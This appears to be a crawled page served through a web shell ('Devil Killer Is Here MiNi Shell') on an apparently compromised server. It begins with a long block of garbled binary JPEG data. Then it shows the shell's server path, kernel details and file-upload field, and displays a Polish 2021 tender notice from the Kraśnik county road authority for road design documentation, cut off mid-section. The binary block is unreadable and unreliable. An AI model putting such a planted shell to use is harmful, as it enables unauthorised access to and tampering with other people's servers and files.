JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210824/0015770001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji dla zadania inwestycyjnego pn.: „Budowa drogi powiatowej relacji Urzędów–Kraśnik–Wyżnianka–Olbięcin” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kraśniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029369</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraśnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 818264126</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-krasnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-krasnik.powiatkrasnicki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji dla zadania inwestycyjnego pn.: „Budowa drogi powiatowej relacji Urzędów–Kraśnik–Wyżnianka–Olbięcin” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b91a3d8b-00e8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00157700</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005119/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dokumentacja projektowa: Budowa drogi powiatowej relacji Urzędów-Kraśnik-Wyżnianka-Olbięcin </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdp-powiatkrasnicki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl w zakładce „Korespondencja”. 2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do<br/>Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do<br/>Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. 3. Ogólne zasady korzystania z<br/>Platformy, z zastrzeżeniem pkt 8 niniejszego rozdziału: 3.1. Zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Systemu na subdomenie https://zdp-powiatkrasnicki.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl .3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło,<br/>wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3.3. Rejestracja<br/>Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować<br/>siępod numerem telefonu podanym w ww. potwierdzeniu. 3.4. Po założeniu konta Wykonawca ma<br/>możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”. 4. Wykonawca może zwrócić się<br/>do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. 5. Treść pytań (bez<br/>ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ,<br/>Zamawiający zamieści za pośrednictwem Platformy Zakupowej. 6. Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa, tel. +48 22<br/>576 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl. 7. Zamawiający określa dopuszczalny format podpisu<br/>elektronicznego, jako: 7.1. Dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES. 7.2.<br/>Dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny<br/>plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego<br/>dokumentu, oddzielny plik z podpisem. 8. Zamawiający określa niezbędne wymagania<br/>sprzętowoaplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej tj.: 8.1. Stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 8.2. Komputer klasy PC lub MAC,<br/>o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; 8.3. Zainstalowana<br/>dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku<br/>Internet Explorer minimalnie wersja 10.0; 8.4. Włączona obsługa JavaScript; 8.5. Zainstalowany<br/>program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1)administratorem Pani/Pana danych osobowych<br/>jest:Zarządu Dróg Powiatowych w Kraśniku,reprezentowany przez Dyrektora Zarządu Dróg<br/>Powiatowych, ul.Szpitalna 2A, 23-204 Kraśnik tel.(+48) 81 8264126, fax: (+48) 81 8251027, e-mail:<br/>sekretariat@zdpkrasnik.pl; 2) kontakt z Inspektorem Ochrony Danych: adres e-mail:<br/>abi@powiatkrasnicki.pl;Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Opracowanie<br/>dokumentacji dla zadania inwestycyjnego pn.:<br/>„Budowa drogi powiatowej relacji Urzędów – Kraśnik – Wyżnianka – Olbięcin”<br/>(oznaczenie sprawy: ZDP/6/TP/2021) prowadzonym w trybie podstawowym; 3)odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11września 2019 r. – Prawo<br/>zamówień publicznych (tekst jedn. Dz. U. z 2021 r. poz. 1129 z późn. zm.),dalej „ustawa Pzp”;<br/>4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 5)obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO; 7) posiada Pani/Pan:a)na podstawie art. 15RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących;b)na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych *;c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO **; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO; 8) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO 9)<br/>odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Zarządu Dróg Powiatowych w<br/>Kraśniku oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672)przy ul.<br/>Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru<br/>Sądowego,prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział<br/>Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436,<br/>NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Zarządu Dróg Powiatowych w<br/>Kraśniku prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem:<br/>https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/6/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Podstawowym celem zamówienia jest:<br/>a) Opracowanie wielobranżowej kompleksowej dokumentacji projektowej w stadium Projektów<br/>Budowlanych i Wykonawczych wraz z dokumentacją geodezyjno-prawną, decyzjami oraz ze<br/>wszystkimi uzgodnieniami i opiniami, dla przedsięwzięcia pn.: „Budowa drogi powiatowej relacji<br/>Urzędów – Kraśnik – Wyżnianka – Olbięcin” wraz z budową i rozbudową obiektów inżynierskich<br/>oraz zabezpieczeniem lub rozbudową urządzeń obcych kolidujących z rozbudowywaną drogą i<br/>obiektami inżynierskimi, umożliwiającej złożenie wniosku i uzyskanie decyzji o zezwoleniu na<br/>realizację inwestycji drogowej (decyzja ZRID) w trybie Ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (j.t.<br/>Dz.U. z 2020 r. poz. 1363 z póżn. zm.) wraz z uzyskaniem wymaganych opinii do wniosku i<br/>przygotowaniem wniosku oraz z materiałami do wniosku o uzyskanie tej decyzji.<br/>b) Opracowanie materiałów i uzyskanie załączników, niezbędnych do uzyskania decyzji o<br/>środowiskowych uwarunkowaniach wraz z jej uzyskaniem przez Wykonawcę.<br/>c) Opracowanie materiałów i uzyskanie załączników, niezbędnych do uzyskania stosownej<br/>zgody wodno-prawnej/pozwolenia wodnoprawnego wraz z jej uzyskaniem przez Wykonawcę.<br/>d) Opracowanie materiałów niezbędnych do ogłoszenia przetargu na wykonanie robót<br/>budowlanych wymaganych przez Prawo Zamówień Publicznych i późniejszą realizację zadania.<br/>2. Wykonawca zapewni Nadzór Autorski w czasie robót realizowanych na podstawie<br/>dokumentacji projektowej oraz w zakresie określonym przez ustawę Prawo budowlane (art. 20<br/>ust.1 pkt 4 ustawy) oraz zgodnie z ustaleniami określonymi we wzorze Umowy. Pełnienie<br/>Nadzoru Autorskiego odbędzie się na zasadach prawa opcji w rozumieniu art. 441 ust. 1 ustawy Prawo zamówień publicznych. Zlecenie wykonywania Nadzoru Autorskiego zależeć będzie od<br/>potrzeb Zamawiającego w momencie zaistnienia sytuacji określonych w Prawie budowlanym.<br/>Wykonawca zobowiązany jest do sprawowania Nadzoru Autorskiego w trakcie realizacji robót<br/>objętych dokumentacją projektową, planowany termin zakończenia realizacji inwestycji do dnia<br/>31 grudnia 2030 r. z możliwością przedłużenia tego terminu w przypadku przedłużenia czasu<br/>trwania budowy i zmiany terminu ostatecznego odbioru robót.<br/>3. Zamawiający w OPZ określił, że przedmiot zamówienia, tj. projekt ma obejmować m.in.<br/>,,Zniesienie barier architektonicznych w obrębie budowanego odcinka drogi dla zapewnienia<br/>dostępności dla wszystkich użytkowników, w szczególności dla osób niepełnosprawnych" (punkt<br/>2.1.1 OPZ), a tym samym jako obiekt publiczny po zrealizowaniu budowy, nie będzie posiadał<br/>ograniczeń dostępności przez wszystkich uczestników ruchu drogowego, w tym przez osoby<br/>niepełnosprawne, do czego obligują przepisy dotyczące wymagań m.in. dla warunków<br/>technicznych, jakim powinny odpowiadać drogi publiczne (j.t. Dz.U. z 2016 r. poz. 124 z późn.<br/>zm.), drogowe obiekty inżynierskie (Dz.U. z 2000 r. Nr 63 poz. 735 z późn. zm.) i budynki (j.t.<br/>Dz.U. z 2019 r. poz. 1065 z późn. zm.).<br/>Szczegółowy zakres przedmiotu zamówienia ujęty jest w Opisie przedmiotu zamówienia<br/>stanowiącym Załącznik nr 1 do Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">70000000-1 - Usługi w zakresie nieruchomości</p> <p class="mb-0">71322300-4 - Usługi projektowania mostów</p> <p class="mb-0">90720000-0 - Ochrona środowiska</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wykonawca zapewni Nadzór Autorski w czasie robót realizowanych na podstawie<br/>przedmiotowej dokumentacji projektowej oraz w zakresie określonym przez ustawę Prawo<br/>budowlane (art. 20 ust.1 pkt 4 ustawy [1]) oraz zgodnie z ustaleniami określonymi we wzorze<br/>Umowy. Pełnienie Nadzoru Autorskiego odbędzie się na zasadach prawa opcji w rozumieniu art.<br/>441 ust. 1 ustawy Prawo zamówień publicznych. Zlecenie wykonywania Nadzoru Autorskiego<br/>zależeć będzie od potrzeb Zamawiającego.<br/>Wykonawca zobowiązany jest do sprawowania Nadzoru Autorskiego w trakcie realizacji robót<br/>objętych dokumentacją projektową, przewidywany termin zakończenia realizacji inwestycji – 31<br/>grudnia 2030 r.<br/>A. Nadzór Autorski obejmuje:<br/>a) nadzór autorski zamiejscowy na budowie (w ilości maksymalnej 30 nadzorów): przygotowanie<br/>materiału do pełnienia nadzoru, czas przejazdu z biura projektowania na budowę i z powrotem,<br/>czas pobytu na budowie w jednym dniu, załatwienie spraw związanych z nadzorem po powrocie.<br/>b) nadzór autorski miejscowy w biurze (w ilości maksymalnej 50 nadzorów):<br/>proste czynności wykonywane w siedzibie Jednostki Projektowej, jeżeli wynika to z potrzeb<br/>realizacji inwestycji, np. wydanie opinii, wykonywanie analizy lub opracowanie pisma nie<br/>wymagającego obecności na budowie itp.<br/>B. Nadzór Autorski będzie sprawowany na zlecenia Zamawiającego. Zlecenia wykonywania<br/>Nadzoru Autorskiego zależeć będą od potrzeb Zamawiającego. Oznacza to, że Zamawiający<br/>może zrezygnować z całości lub z części określonej w SWZ przez Zamawiającego maksymalnej<br/>ilości nadzoru autorskiego (prawo opcji).<br/>C. Rozliczenie następować będzie na podstawie zleconych i wykonanych pobytów zespołu na<br/>budowie lub w przypadku Nadzoru Autorskiego miejscowego po otrzymaniu przez Zamawiającego przedmiotu nadzoru. tj. opinii, analizy, innych pism niewymagających obecności<br/>na budowie.<br/>D. Zamawiający powiadomi pisemnie Wykonawcę o planowanym rozpoczęciu realizacji prac<br/>objętych dokumentacją projektową co najmniej 2 tygodnie przed planowanym terminem<br/>rozpoczęcia prac. Zlecenie wykonania Nadzoru Autorskiego nastąpi co najmniej na 3 dni<br/>robocze przed określonym przez Zamawiającego terminem wykonania nadzoru. Zlecenie<br/>wykonania Nadzoru następować będzie pisemnie.<br/>Pisemne zlecenie zostanie jednocześnie przekazane mailowo na adres wskazany przez<br/>Wykonawcę. Równocześnie Zamawiający poinformuje Wykonawcę o zleceniu telefonicznie. W<br/>sytuacjach szczególnych (np. katastrofa budowlana), wymagających niezwłocznej obecności<br/>autora projektu na terenie prowadzenia robót, osoba pełniąca nadzór autorski zobowiązana jest<br/>wykonać nadzór autorski w dniu powiadomienia. W takim wypadku zlecenie wykonania Nadzoru<br/>Autorskiego może nastąpić telefonicznie z późniejszym pisemnym potwierdzeniem dokonania zlecenia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis sposobu oceny ofert zawarty jest w pkt. XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wykonanie otworów badawczych w badaniach geotechnicznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w 